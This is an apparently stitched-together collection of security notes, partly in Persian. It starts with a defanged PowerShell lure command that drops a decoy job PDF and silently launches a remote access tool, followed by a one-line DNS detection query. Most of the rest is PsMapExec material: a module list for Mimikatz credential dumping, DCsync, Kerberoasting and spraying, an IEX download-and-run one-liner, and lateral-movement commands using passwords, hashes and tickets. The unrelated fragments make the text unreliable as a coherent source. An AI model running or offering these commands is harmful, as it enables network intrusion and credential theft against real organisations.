powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Description.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

event_type: "dnsreqwin"

AND

dns_rname: "b-cdn.net"

پشتیبانی از چند دامنه

بهبود عملکرد از طریق Proxifier / تونل‌های SSH

امکان روشن/خاموش کردن RDP
ماژول‌های جدید:

EventCreds

GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs

RDP
SessionHunter
SMB
SMB Signing
LDAP / LDAPS
SSH
Spraying
VNC
WinRM
WMI
MSSQL
Kerberoast

Amnesiac — اجرای payloadهای Amnesiac C2
ConsoleHistory — تاریخچه در PowerShell
Files — فایل‌ها در دایرکتوری‌های متداول
KerbDump — دامپ تیکت‌های Kerberos
eKeys — دامپ کلیدها (Mimikatz)
LogonPasswords — دامپ پسوردهای لاگ‌آن (Mimikatz)
LSA — دامپ LSA (Mimikatz)
NTDS — پیاده‌سازی DCsync
SAM — دامپ SAM

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

PsMapExec -Targets All -Method [Method]

PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

PsMapExec -Method Kerberoast -ShowOutput

PsMapExec -Targets All -Method [Method] -Module [Module]